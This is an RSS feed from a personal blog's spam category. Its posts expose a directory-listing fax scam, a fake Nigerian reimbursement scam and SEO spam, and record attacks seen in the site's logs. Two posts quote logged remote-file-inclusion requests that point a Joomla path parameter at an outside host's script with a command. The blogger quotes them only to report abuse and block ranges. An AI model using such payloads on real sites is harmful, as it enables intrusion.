<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Dragon&#039;s Thinking &#187; spamming</title>
	<atom:link href="http://www.dragonthoughts.com/blog/category/spamming/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.dragonthoughts.com/blog</link>
	<description>Updates and news about dragonthoughts.com and a few friends</description>
	<lastBuildDate>Tue, 02 Mar 2010 10:22:31 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>World Business Guide &#8211; Business directory scam</title>
		<link>http://www.dragonthoughts.com/blog/2009/09/02/world-business-guide-directory-scam/</link>
		<comments>http://www.dragonthoughts.com/blog/2009/09/02/world-business-guide-directory-scam/#comments</comments>
		<pubDate>Wed, 02 Sep 2009 12:15:25 +0000</pubDate>
		<dc:creator>dclarke</dc:creator>
				<category><![CDATA[scam]]></category>
		<category><![CDATA[spamming]]></category>

		<guid isPermaLink="false">http://www.dragonthoughts.com/blog/?p=681</guid>
		<description><![CDATA[World Business Guide - Business directory scam]]></description>
			<content:encoded><![CDATA[<p>World Business guide appears to be a new version of the <a href="http://www.dragonthoughts.com/blog/2008/06/30/european-city-guide-scammers-back-in-business/">European City Guide Scam</a>. This particular one arrives as a spam email, asking a company &#8220;To update your company profile &#8230; complete and return this form (UPDATING IS FREE OF CHARGE). <strong>Only sign if you want to place an insertion</strong>.&#8221;</p>
<p>&#8220;World Business Guide&#8221; place a lot of emphasis on the fre update, but not on the fact that signing and faxing their document will bind the </p>
<blockquote><p>
<strong>The signing of this document represents the acceptance of the following conditions</strong> and the conditions stated in “the terms and Conditions for insertion” on webpage: www.world-businessguide.com. The signing is legally binding and gives you the right of an insertion In the online data base of the world business guide, which can be accessed via the internet. A cd rom with worldwide businesses is Granted, all in accordance with the contract conditions stated in “the terms and conditions for insertion” on webpage: www.worldbusinessguide.Com. The validation time of the contract is three years and starts on the eighth day after signing the contract. The insertion Is granted after signing and receiving this document by the service provider. <strong>I hereby order a subscription with service provider International directories ltd</strong> “world business guide”. I will have <strong>an insertion into its data base for three year</strong>s. The <strong>price per year is euro 995</strong>. The <strong>subscription will be automatically extended every year for another year</strong>, unless specific written notice is received by the service Provider or the subscriber two months before the expiration of the subscription. Your data will be recorded. The place of jurisdiction In any dispute arising is the service provider’s address. The agreement between the service provider and the subscriber is governed by the Conditions stated in “the terms and conditions for insertion” on webpage: www.world-businessguide. com
</p></blockquote>
<p>The spam was sent from <a href="mailto:nfo@bestorganization4you.com">nfo@bestorganization4you.com</a></p>
<p>World Business Guide&#8217;s apparent contact details are is</p>
<address>
WORLD BUSINESS GUIDE<br />
P.O. Box 2021<br />
3500 GA Utrecht<br />
The Netherlands</p>
<p>email: <a href="mailto:register@wbgtoday.net">register@wbgtoday.net</a><br />
FAX: +31 20 524 8107<br />
</address>
<p>For some reason the business uses a PO Box, rather than their own business address.</p>
<p>But it is worth noting that &#8220;The World Business Guide is a product of International Directories Group Ltd., C/ Azcona, 58, local · BOX 252 · 28028 · MADRID · SPAIN&#8221; which again are reluctant to provide a real address. Also they apparently were once <a href="http://www.stopecg.org/world_business_directory.htm">EU Business Services Ltd Trading As World Business Directory</a> but have changed their name. </p>
<p>They registered the domain name wbgtoday. com in April 2009,  under the following address </p>
<address>International Directories LTD<br />
    C/Azcona 58  Local<br />
    Madrid     28028<br />
    ES</p>
<p> <a href="mailto:bricinternational@gmail.com">bricinternational@gmail.com</a><br />
</address>
<p>It has been <a href="http://www.ukbusinessforums.co.uk/forums/showthread.php?t=88804">identified by other businesses as being a scam</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dragonthoughts.com/blog/2009/09/02/world-business-guide-directory-scam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Japanese Characters &#8211; Emoji</title>
		<link>http://www.dragonthoughts.com/blog/2009/01/14/new-japanese-characters-emoji/</link>
		<comments>http://www.dragonthoughts.com/blog/2009/01/14/new-japanese-characters-emoji/#comments</comments>
		<pubDate>Wed, 14 Jan 2009 22:45:38 +0000</pubDate>
		<dc:creator>dclarke</dc:creator>
				<category><![CDATA[Favourite Searches]]></category>
		<category><![CDATA[Internationalisation]]></category>
		<category><![CDATA[Japan]]></category>
		<category><![CDATA[spamming]]></category>
		<category><![CDATA[technology]]></category>
		<category><![CDATA[emoji]]></category>
		<category><![CDATA[emoticon]]></category>
		<category><![CDATA[ideograph]]></category>
		<category><![CDATA[japanese]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[SMS]]></category>
		<category><![CDATA[Unicode]]></category>

		<guid isPermaLink="false">http://www.dragonthoughts.com/blog/?p=626</guid>
		<description><![CDATA[Apparently Japanese telecoms companies are trying to convince the world that written Japanese does not already have enough characters. These additional characters are used to depict emotions and other symbols in a similar manner to SMS emoticons. Rather than being combinations of characters, such a , which is entered as a : followed by a [...]]]></description>
			<content:encoded><![CDATA[<p>Apparently Japanese telecoms companies are trying to convince the world that written Japanese does not already have enough characters.</p>
<p>These additional characters are used to depict emotions and other symbols in a similar manner to SMS emoticons.</p>
<p>Rather than being combinations of characters, such a <img src='http://www.dragonthoughts.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  , which is entered as a : followed by a ) ,  to represent a smiley in the Latin character sets, there is a movement to create a whole range of  new symbols, into Unicode, which include colour and animation.</p>
<p>At present, they are exchanged in  SMS messages by using privately agreed character codes, but there is pressure to add these new emoji ideographs into the Unicode specification.</p>
<p>Some of the key problems that adding Emoji to the Unicode standards would present include:</p>
<ol>
<li>Adding shapes to Unicode, which has carefully remianed indepentant of how glyphs are drawn</li>
<li>Adding colour requirements to Unicode, which again has had no logical need to specify colours for characters</li>
<li>Adding the concept of animation definitions to characters, which is well outside the range of a character set definition</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.dragonthoughts.com/blog/2009/01/14/new-japanese-characters-emoji/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Scam Targeting Nigerian Scam Victims</title>
		<link>http://www.dragonthoughts.com/blog/2008/08/26/scam-targeting-nigerian-scam-victims/</link>
		<comments>http://www.dragonthoughts.com/blog/2008/08/26/scam-targeting-nigerian-scam-victims/#comments</comments>
		<pubDate>Tue, 26 Aug 2008 10:49:01 +0000</pubDate>
		<dc:creator>dclarke</dc:creator>
				<category><![CDATA[scam]]></category>
		<category><![CDATA[spamming]]></category>
		<category><![CDATA[fraud]]></category>
		<category><![CDATA[nigeria-scamvictims]]></category>
		<category><![CDATA[nigerian]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://www.dragonthoughts.com/blog/?p=92</guid>
		<description><![CDATA[I recently received some spam which talked about compensating victims of Nigerian email scams. This is a particularly noxious scam, as the spammer is targeting people who are already victims of fraud. Presumably the organisers feel that if somebody is gullible and greedy enough to fall for one fraud, they are an ideal candidate for [...]]]></description>
			<content:encoded><![CDATA[<p>I recently received some spam which talked about compensating victims of Nigerian email scams.</p>
<p>This is a particularly noxious scam, as the spammer is targeting people who are already victims of fraud. Presumably the organisers feel that if somebody is gullible and greedy enough to fall for one fraud, they are an ideal candidate for another.</p>
<p>The scammers claim to be from a &#8220;Nigerian Government Reimbursement Committee&#8221; but host their web site at itgo.com (also known as freeserver.com) who provide free web hosting. The pages that they present are almost plausible, apart from the fact that they carry advertisements from the hosting company and use free gmail addresses.</p>
<p>Their pages include wonderful statements such as </p>
<blockquote><p>
As regards these ongoing developmental strive; we have over 210 suspects at hand, 135 in Kirikiri prison here in Nigeria. While many are awaiting trial, we are still in search of others, who think they are wise, and hope that you will assist by giving any vital information that could lead to the apprehension of these hoodlums.</p>
<p>We shall be waiting to hearing from you been certain that you were truly scammed by a Nigerian and you have proves to back your claim.<br />
<a href="mailto:cyberfraud.department@gmail.com">cyberfraud.department@gmail.com</a>
</p></blockquote>
<p>The text of the scam email is as follows:</p>
<blockquote><p>
Attention:</p>
<p>This email is not in any manner directed to you, but its purposely and specifically directed to Nigeria Scam victims. . However, if you have fallen for Nigerian Scams, do not hesitate to contact us or visit our website for more<br />
details on how we can help.</p>
<p>We shall be waiting to hearing from you been certain that you were truly scammed by a Nigerian and you have proves to back your claims. Please read the full report at our website: http://www.nigeria-scamvictims.itgo.com/</p>
<p>Yours faithfully,<br />
Brian Adams<br />
Nigerian Government Reimbursement Committee</p></blockquote>
<p>This particular specimen claims to have been sent by Brian Adams at <a href="mailto:baantinigeriascams@gmail.com">baantinigeriascams@gmail.com</a>, but other examples can be found from somebody calling himself David Bamko.</p>
<p>Isn&#8217;t it amazing that the supposed anti-fraud parts of the Nigerian government need to use gmail addresses an free hosting services supported by advertising and pop-ups?</p>
<p>Is it possible that they ask for all the information used in one fraud, to duplicate the fraud?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dragonthoughts.com/blog/2008/08/26/scam-targeting-nigerian-scam-victims/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Foreign Search Engine Promotion Spam</title>
		<link>http://www.dragonthoughts.com/blog/2008/03/13/foreign-search-engine-promotion-spam/</link>
		<comments>http://www.dragonthoughts.com/blog/2008/03/13/foreign-search-engine-promotion-spam/#comments</comments>
		<pubDate>Thu, 13 Mar 2008 15:55:50 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[Rants]]></category>
		<category><![CDATA[spamming]]></category>

		<guid isPermaLink="false">http://www.dragonthoughts.com/blog/2008/03/13/foreign-search-engine-promotion-spam/</guid>
		<description><![CDATA[A customer of mine recently received the following spam&#8230; Amazingly, considering that they promise worldwide search engine optimization, Dr. Marc Schneider and his company Global Vibration Inc., can only be found as being mentioned on sites relating to spamming. I am Dr. Marc Schneider and I work for Global Vibration Inc. in Washington DC ( [...]]]></description>
			<content:encoded><![CDATA[<p>
A customer of mine recently received the following spam&#8230;
</p>
<p>
Amazingly, considering that they promise worldwide search engine optimization, Dr. Marc Schneider and his company Global Vibration Inc.,  can only be found as being mentioned on sites relating to spamming.
</p>
<blockquote><p>
<small>I am Dr. Marc Schneider and I work for Global Vibration Inc.  in Washington DC  ( Tel: 1 202-787-3989 ) &#8211; I would like to speak with the person in charge of your international clientele. Who is my contact? Who should I speak to??</p>
<p>In fact, after visiting http://www.myclients.web.site.co.uk,  I have noticed that your website cannot be found on foreign search engines (I tested  it on Hispanic search engines, German search engines, Asian search engines,  etc.) Our company is specialized in multilingual search engine promotions in 28 languages . From the Japanese Google to the German Yahoo, from the AOL  in Spanish to the MSN in Chinese, we can show you how to develop a true international online presence by promoting your website on foreign search engines.</p>
<p>Let us show  you how to develop a presence on the multilingual web without having to  translate your website: It is not necessary to translate your website in  order to submit to foreign search engines, however, you need to have at least  1 page in Japanese optimized with Japanese keywords and meta tags in order to  submit to Japanese search engines, at least 1 page in Spanish optimized with  Spanish keywords in order to submit to Hispanic search engines and so  on&#8230;</p>
<p>I strongly suggest that you watch our online presentation which  will explains clearly how to get top rankings on foreign search engines with  only 1 entry page per language (click on the following link or copy-paste it  into your web browser): http://www.mplw.net/demo</p>
<p>From the Japanese Google to the German Yahoo, from the AOL  in Spanish to the MSN in Chinese, get users to find your website when  searching with YOUR KEYWORDS in their Native language.</p>
<p>Please call me at 1  (202)-787-3989 or email me and let&#8217;s work on giving your website the true  international exposure which it deserves to have with foreign native online  users!!</p>
<p>Regards,</p>
<p>Marc Schneider, Ph.D.<br />
<a href="mailto:Marcs@mplw.net">Marcs@mplw.net</a><br />
_____________________</p>
<p>GLOBAL VIBRATION INC.<br />
1250 Connecticut Ave N.W. Suite  200<br />
Washington, DC 20036 USA<br />
TEL:1 (202)-787-3989 &#8211; FAX: 1 (202)-318-4779<br />
http://www.mplw.net :<br />
Multilingual Search Engine Promotion Services since 1999.</small>
</p></blockquote>
<p>
They don&#8217;t seem to have a presence at all on Japanese google.
</p>
<p>
They claim to have been doing Multilingual Search Engine Promotion Services (SEO) since 1999, but a whois query of their domain  mplw.net shows a creation date of 04 Aug 2007 16:13:29
</p>
<p>
Many other companies are receiving the same spam for example, see <a href="http://www.tmcowners.com/teamtalk/showthread.php?t=21367" rel="nofollow">http://www.tmcowners.com</a></p>
<p>
For such a multi-nationally aware company, sending spam to the UK, Global Vibration Inc. haven&#8217;t even been capable of putting their own phone number in the standard international format, presumably because they are not aware that anyone outside the USA has to dial in international number to reach them.
</p>
<p>Associated with their domains are the following administrative email addresses</p>
<ul>
<li><a href="mailto:urls@mseo.com">urls@mseo.com</a></li>
<li><a href="mailto:mauispirit@gmail.com">mauispirit@gmail.com</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.dragonthoughts.com/blog/2008/03/13/foreign-search-engine-promotion-spam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Script Kiddies 3</title>
		<link>http://www.dragonthoughts.com/blog/2007/06/06/script-kiddies-3/</link>
		<comments>http://www.dragonthoughts.com/blog/2007/06/06/script-kiddies-3/#comments</comments>
		<pubDate>Wed, 06 Jun 2007 16:47:44 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[spamming]]></category>

		<guid isPermaLink="false">http://www.dragonthoughts.com/blog/?p=52</guid>
		<description><![CDATA[I saw a couple of entries in the logs that looked like similar attempts to deface the site as seen in the article, script kiddies 2, however they seem either different, or more sophisticated.]]></description>
			<content:encoded><![CDATA[<p>I saw a couple of entries in the logs that looked like similar attempts to deface the site as seen in the article, script kiddies 2, however they seem either different, or more sophisticated.<span id="more-52"></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.dragonthoughts.com/blog/2007/06/06/script-kiddies-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>phpnet.us act against spammer</title>
		<link>http://www.dragonthoughts.com/blog/2007/05/30/phpnetus-act-against-spammer/</link>
		<comments>http://www.dragonthoughts.com/blog/2007/05/30/phpnetus-act-against-spammer/#comments</comments>
		<pubDate>Wed, 30 May 2007 08:10:57 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[spamming]]></category>

		<guid isPermaLink="false">http://www.dragonthoughts.com/blog/?p=51</guid>
		<description><![CDATA[phpnet.us cancel web site defacer's account]]></description>
			<content:encoded><![CDATA[<p>After the mention in <a href="http://www.dragonthoughts.com/blog/?p=50">Script Kiddies 2</a> and being given a report that one of their account holders has put up a site defacing script, the free hosting site <a href="http://www.phpnet.us/" rel-"nofollow">phpnet.us</a> cancelled the damaging account.<br />
It is a real pity that so many of their competitors do not act equally responsibly.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dragonthoughts.com/blog/2007/05/30/phpnetus-act-against-spammer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Script Kiddies 2</title>
		<link>http://www.dragonthoughts.com/blog/2007/05/29/script-kiddies-2/</link>
		<comments>http://www.dragonthoughts.com/blog/2007/05/29/script-kiddies-2/#comments</comments>
		<pubDate>Tue, 29 May 2007 15:19:05 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[spamming]]></category>

		<guid isPermaLink="false">http://www.dragonthoughts.com/blog/?p=50</guid>
		<description><![CDATA[The logs showed up another attempted exploit, very similar to the one in New Hack Attempt 88.242.239.182 - - [27/May/2007:18:40:29 +0100] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://xyu.phpnet.us/xyu.dat?&#038;list=1&#038;cmd=id HTTP/1.0" 403 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" phpnet.us which provides the hosting does not give a direct way for unregistered users to contact them regarding abuse, but I [...]]]></description>
			<content:encoded><![CDATA[<p>The logs showed up another attempted exploit, very similar to the one in <a href="http://www.dragonthoughts.com/blog/?p=47">New Hack Attempt</a></p>
<blockquote><p><code>88.242.239.182 - - [27/May/2007:18:40:29 +0100] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://xyu.phpnet.us/xyu.dat?&#038;list=1&#038;cmd=id HTTP/1.0" 403 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"<br />
</code></p></blockquote>
<p>phpnet.us which provides the hosting does not give a direct way for unregistered users to contact them regarding abuse, but I have used the registered email address at hostorgadmin@googlemail.com to let phpnet.us know that there service is being used by script kiddies.</p>
<p>The originating IP address belongs to the the familiar TurkTelekom, who seem to have become the home of some script kiddies.</p>
<blockquote><p>inetnum:    	        88.242.64.0 &#8211; 88.242.255.255<br />
netname:    	        TurkTelekom<br />
descr:    	          TT ADSL-alcatel dynamic_aci</p></blockquote>
<p>As usual, their abuse account bounced a the complaint.<br />
It looks like another of their IP ranges will have to be blocked.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dragonthoughts.com/blog/2007/05/29/script-kiddies-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Hack attempted</title>
		<link>http://www.dragonthoughts.com/blog/2007/05/22/new-hack-attempted/</link>
		<comments>http://www.dragonthoughts.com/blog/2007/05/22/new-hack-attempted/#comments</comments>
		<pubDate>Tue, 22 May 2007 16:48:11 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[spamming]]></category>

		<guid isPermaLink="false">http://www.dragonthoughts.com/blog/?p=47</guid>
		<description><![CDATA[Hackers attempt to graffiti dragonthoughts.com]]></description>
			<content:encoded><![CDATA[<p>The following hack attempt appeared in the dragonthoughts logs yesterday.</p>
<blockquote><p>88.233.150.109 &#8211; - [21/May/2007:21:39:02 +0100] &#8220;GET /index.php?mosConfig_absolute_path=http://genchackers.net/tool20.dat?&#038;list=1&#038;cmd=id HTTP/1.0&#8243; 403 283 &#8220;-&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)&#8221;
</p></blockquote>
<p>presumably it is a script kiddy, who has no idea how old the exploit is, but these reports of a year ago will provide an idea:</p>
<ul>
<li><a href="http://osvdb.org/displayvuln.php?osvdb_id=27010">http://osvdb.org/displayvuln.php?osvdb_id=27010</a></li>
<li><a href="http://xforce.iss.net/xforce/xfdb/27906">http://xforce.iss.net/xforce/xfdb/27906</a></li>
</ul>
<p>The listed abuse reporting email address bounced my complaint, for the originators IP range 88.233.0.0 &#8211; 88.233.255.255</p>
<blockquote><p>netname:    	        TurkTelekom<br />
descr:    	          TT ADSL-alcatel_gay</p></blockquote>
<p>So, all of its IP ranges will have their access blocked.</p>
<p>As will the range 212.175.205.0- 212.175.205.255 which is hosting genchackers.net</p>
<p>The hacker script that is hosted at genchackers.net was ripped off from <a href="http://georgiaeliteallstars.com" rel="nofollow">http://georgiaeliteallstars.com</a> although they seem to have taken the script down now.</p>
<p>As it stands, the script can&#8217;t work for the kiddie that downloaded it, but  I don&#8217;t think it is appropriate or ethical to explain how to fix it!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dragonthoughts.com/blog/2007/05/22/new-hack-attempted/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Blog spammers</title>
		<link>http://www.dragonthoughts.com/blog/2007/04/23/blog-spammers/</link>
		<comments>http://www.dragonthoughts.com/blog/2007/04/23/blog-spammers/#comments</comments>
		<pubDate>Mon, 23 Apr 2007 18:26:56 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[spamming]]></category>

		<guid isPermaLink="false">http://www.dragonthoughts.com/blog/?p=43</guid>
		<description><![CDATA[Blog spammers obsessed with Japanese interest rates]]></description>
			<content:encoded><![CDATA[<p>Over the last couple of days, the blog spammers have been trying to comment on the Japanese interest rate changes.</p>
<p>Various IP addresses are being used, which suggests a botnet, but as they are all trying to push links on the same page to the same sexually explicit, and probably illegal sites, it is fair to assume that they are linked.</p>
<p>The IP addresses of these attacks so far are: </p>
<blockquote><p>24.199.119.150<br />
24.22.218.231<br />
24.230.136.95<br />
87.245.109.208<br />
75.27.187.192<br />
88.6.79.188<br />
172.192.85.173<br />
200.185.242.156<br />
201.13.92.43<br />
216.76.227.127</p></blockquote>
<p>Additional compromised IP addresses which try to add their spam to the Japanese interest rate article for 24<sup>th</sup> April 2007</p>
<blockquote><p>
24.14.156.99<br />
69.1.40.80<br />
71.63.151.152<br />
75.57.135.91<br />
75.52.255.169
</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.dragonthoughts.com/blog/2007/04/23/blog-spammers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Persistent spammer</title>
		<link>http://www.dragonthoughts.com/blog/2006/10/11/persistent-spammer/</link>
		<comments>http://www.dragonthoughts.com/blog/2006/10/11/persistent-spammer/#comments</comments>
		<pubDate>Wed, 11 Oct 2006 15:59:53 +0000</pubDate>
		<dc:creator>Administrator</dc:creator>
				<category><![CDATA[spamming]]></category>

		<guid isPermaLink="false">http://www.dragonthoughts.com/blog/?p=36</guid>
		<description><![CDATA[Spammer keeps trying by spoofing different user agent]]></description>
			<content:encoded><![CDATA[<p>A blog spammer, has recently been trying to leave its rubbish on this site. Interstingly, each time it was denied, it tries again pretending to be a different user agent, without any repeats.</p>
<p>Access from the same IP address (64.28.178.66) repeatedly tries to access random blog pages, some of which don&#8217;t even exist.</p>
<p>Here&#8217;s an extract from the log&#8230;</p>
<blockquote><p>64.28.178.66 &#8211; - [10/Oct/2006:20:17:50 +0100] &#8220;GET /blog/?p=13 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; SV1; .NET CLR 1.1.4322)&#8221;<br />
64.28.178.66 &#8211; - [10/Oct/2006:20:37:34 +0100] &#8220;GET /blog/?p=21 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1&#8243;<br />
64.28.178.66 &#8211; - [10/Oct/2006:21:52:26 +0100] &#8220;GET /blog/?p=6 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;EVE-minibrowser/&#8221;<br />
64.28.178.66 &#8211; - [10/Oct/2006:22:16:38 +0100] &#8220;GET /blog/?p=14 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5&#8243;<br />
64.28.178.66 &#8211; - [10/Oct/2006:22:22:55 +0100] &#8220;GET /blog/?p=11 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)&#8221;<br />
64.28.178.66 &#8211; - [10/Oct/2006:22:53:52 +0100] &#8220;GET /blog/?p=34 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)&#8221;<br />
64.28.178.66 &#8211; - [10/Oct/2006:22:54:48 +0100] &#8220;GET /blog/?p=22 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Maxthon; iOpus-I-M; SV1; .NET CLR 1.1.4322)&#8221;<br />
64.28.178.66 &#8211; - [11/Oct/2006:00:34:53 +0100] &#8220;GET /blog/index.php?p=30 HTTP/1.1&#8243; 403 288 &#8220;-&#8221; &#8220;OmniExplorer_Bot/3.11c (+http://www.omni-explorer.com) WorldIndexer&#8221;<br />
64.28.178.66 &#8211; - [11/Oct/2006:01:29:30 +0100] &#8220;GET /blog/index.php?p=30 HTTP/1.1&#8243; 403 288 &#8220;-&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; [eburo v1.3]; .NET CLR 1.1.4322)&#8221;<br />
64.28.178.66 &#8211; - [11/Oct/2006:01:31:14 +0100] &#8220;GET /blog/?p=10 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)&#8221;<br />
64.28.178.66 &#8211; - [11/Oct/2006:03:09:43 +0100] &#8220;GET /blog/?p=18 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/4.0 (firatnyvr; MSIE 6.0; ; SV1)&#8221;<br />
64.28.178.66 &#8211; - [11/Oct/2006:04:50:30 +0100] &#8220;GET /blog/?p=14 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;OmniExplorer_Bot/3.11c (+http://www.omni-explorer.com) WorldIndexer&#8221;<br />
64.28.178.66 &#8211; - [11/Oct/2006:12:01:03 +0100] &#8220;GET /blog/?p=13 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041116 Firefox/1.0 (Ubuntu) (Ubuntu package 1.0-2ubuntu3)&#8221;<br />
64.28.178.66 &#8211; - [11/Oct/2006:12:18:56 +0100] &#8220;GET /blog/?p=21 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/4.0 (cOsmO&SoNnE; MSIE 6.0; Windows XP)&#8221;<br />
64.28.178.66 &#8211; - [11/Oct/2006:13:33:53 +0100] &#8220;GET /blog/?p=6 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;LinkWalker&#8221;<br />
64.28.178.66 &#8211; - [11/Oct/2006:13:57:28 +0100] &#8220;GET /blog/?p=14 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)&#8221;<br />
64.28.178.66 &#8211; - [11/Oct/2006:14:04:21 +0100] &#8220;GET /blog/?p=11 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firechicken/1.0&#8243;<br />
64.28.178.66 &#8211; - [11/Oct/2006:16:39:33 +0100] &#8220;GET /blog/?p=2 HTTP/1.1&#8243; 403 279 &#8220;-&#8221; &#8220;Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1&#8243;</p></blockquote>
<p>Does anyone know anything about this outfit?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dragonthoughts.com/blog/2006/10/11/persistent-spammer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
